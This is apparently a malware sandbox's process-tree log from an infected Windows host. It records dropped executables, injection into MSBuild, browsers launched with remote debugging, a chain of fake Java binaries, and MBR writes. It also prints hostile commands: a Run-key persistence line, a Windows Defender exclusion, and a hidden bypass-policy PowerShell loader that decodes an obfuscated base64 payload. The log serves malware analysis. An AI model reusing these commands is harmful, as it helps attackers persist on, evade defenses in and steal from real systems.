C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1408,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:811⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3560,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=3652 /prefetch:111⤵
- Uses browser remote debugging
PID:2324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:111⤵
- Uses browser remote debugging
PID:3852
-
-
-
C:\ProgramData\sjeknyus2n.exe"C:\ProgramData\sjeknyus2n.exe"10⤵PID:3804
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:5452
-
-
-
C:\ProgramData\t2vknozusr.exe"C:\ProgramData\t2vknozusr.exe"10⤵PID:2444
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:548
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
PID:12072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe85edcf8,0x7fffe85edd04,0x7fffe85edd1013⤵PID:12116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2748,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2528 /prefetch:213⤵PID:2496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2784 /prefetch:313⤵PID:3552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2084,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2800 /prefetch:813⤵PID:5216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:113⤵
- Uses browser remote debugging
PID:1212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3308 /prefetch:113⤵
- Uses browser remote debugging
PID:3308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4224,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4240 /prefetch:213⤵
- Uses browser remote debugging
PID:4184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4416,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4664 /prefetch:113⤵
- Uses browser remote debugging
PID:6676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5208,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5196 /prefetch:813⤵PID:8876
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
PID:8008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch13⤵
- Uses browser remote debugging
PID:8064 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f0,0x7fffc675f208,0x7fffc675f214,0x7fffc675f22014⤵PID:7880
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 131212⤵
- Program crash
PID:6716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 184012⤵
- Program crash
PID:8636
-
-
-
-
C:\ProgramData\8qiecb1dtj.exe"C:\ProgramData\8qiecb1dtj.exe"10⤵PID:5980
-
C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exeC:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exe 011⤵PID:784
-
C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\r5Ar49XnOHOcT7d8.exeC:\Users\Admin\AppData\Local\Temp\sH9oHYT4\r5Ar49XnOHOcT7d8.exe 78412⤵PID:4696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 134413⤵
- Program crash
PID:25580
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 158412⤵
- Program crash
PID:25556
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\3e3wt" & exit10⤵PID:6912
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1111⤵
- Delays execution with timeout.exe
PID:7008
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3632 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4756 -
C:\Users\Admin\AppData\Local\Temp\is-IB89K.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-IB89K.tmp\Bell_Setup16.tmp" /SL5="$B01CA,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\is-08HSJ.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-08HSJ.tmp\Bell_Setup16.tmp" /SL5="$70210,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:468 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5416
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵
- Executes dropped EXE
PID:2296 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe9⤵
- Executes dropped EXE
PID:2348 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe10⤵
- Executes dropped EXE
PID:1484 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe11⤵
- Executes dropped EXE
PID:5276 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe12⤵
- Executes dropped EXE
PID:5216 -
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe13⤵
- Executes dropped EXE
PID:5596 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe14⤵
- Executes dropped EXE
PID:2432 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe15⤵
- Executes dropped EXE
PID:2688 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe16⤵
- Executes dropped EXE
PID:2140 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe17⤵
- Executes dropped EXE
PID:932 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe18⤵
- Executes dropped EXE
PID:5256 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe19⤵
- Executes dropped EXE
PID:1148 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe20⤵
- Executes dropped EXE
PID:548 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe21⤵
- Executes dropped EXE
PID:1116 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe22⤵
- Executes dropped EXE
PID:3620 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe23⤵
- Executes dropped EXE
PID:5800 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe24⤵
- Executes dropped EXE
PID:3208 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe25⤵
- Executes dropped EXE
PID:3480 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe26⤵
- Executes dropped EXE
PID:1088 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe27⤵
- Executes dropped EXE
PID:404 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe28⤵
- Executes dropped EXE
PID:3684 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe29⤵
- Executes dropped EXE
PID:5684 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe30⤵
- Executes dropped EXE
PID:4424 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe31⤵
- Executes dropped EXE
PID:2996 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe32⤵
- Executes dropped EXE
PID:1680 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe33⤵
- Executes dropped EXE
PID:4260 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe34⤵
- Executes dropped EXE
PID:5316 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe35⤵
- Executes dropped EXE
PID:3644 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe36⤵
- Executes dropped EXE
PID:5616 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe37⤵
- Executes dropped EXE
PID:3620 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe38⤵
- Executes dropped EXE
PID:5520 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe39⤵
- Executes dropped EXE
PID:4732 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe40⤵
- Executes dropped EXE
PID:3228 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe41⤵
- Executes dropped EXE
PID:2032 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe42⤵
- Executes dropped EXE
PID:1088 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe43⤵
- Executes dropped EXE
PID:5900 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe44⤵PID:3280
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe45⤵PID:2172
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe46⤵PID:5068
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe47⤵PID:4424
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe48⤵PID:4112
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe49⤵PID:3380
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_platform.exe"50⤵
- Modifies registry key
PID:2308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe\"'"50⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe50⤵
- Command and Scripting Interpreter: PowerShell
PID:5980
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5964 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
PID:5960
-
-
-
C:\Users\Admin\AppData\Local\Temp\10044090101\eb2df5e704.exe"C:\Users\Admin\AppData\Local\Temp\10044090101\eb2df5e704.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5316 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10044090101\eb2df5e704.exe"9⤵PID:4508
-
-
-
C:\Users\Admin\AppData\Local\Temp\10044100101\6dbecdb1f3.exe"C:\Users\Admin\AppData\Local\Temp\10044100101\6dbecdb1f3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10044100101\6dbecdb1f3.exe"9⤵PID:876
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370210101\7866b52300.exe"C:\Users\Admin\AppData\Local\Temp\10370210101\7866b52300.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3280
-
-
C:\Users\Admin\AppData\Local\Temp\10370260101\194b034ebb.exe"C:\Users\Admin\AppData\Local\Temp\10370260101\194b034ebb.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3596 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10370260101\194b034ebb.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370270101\2609233090.exe"C:\Users\Admin\AppData\Local\Temp\10370270101\2609233090.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3632 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10370270101\2609233090.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370280101\6lV7WRt.exe"C:\Users\Admin\AppData\Local\Temp\10370280101\6lV7WRt.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:876 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3108
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370290101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10370290101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3504
-
-
C:\Users\Admin\AppData\Local\Temp\10370300101\6a8d5b79b0.exe"C:\Users\Admin\AppData\Local\Temp\10370300101\6a8d5b79b0.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1988
-
-
C:\Users\Admin\AppData\Local\Temp\10370310101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10370310101\TbV75ZR.exe"6⤵PID:1520
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 5008⤵
- Program crash
PID:5336
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370320101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10370320101\EPTwCQd.exe"6⤵PID:6036
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4960
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370330101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10370330101\7IIl2eE.exe"6⤵PID:2240
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10370341121\8BNn7ce.cmd"6⤵PID:5264
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10370341121\8BNn7ce.cmd"7⤵PID:5088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeX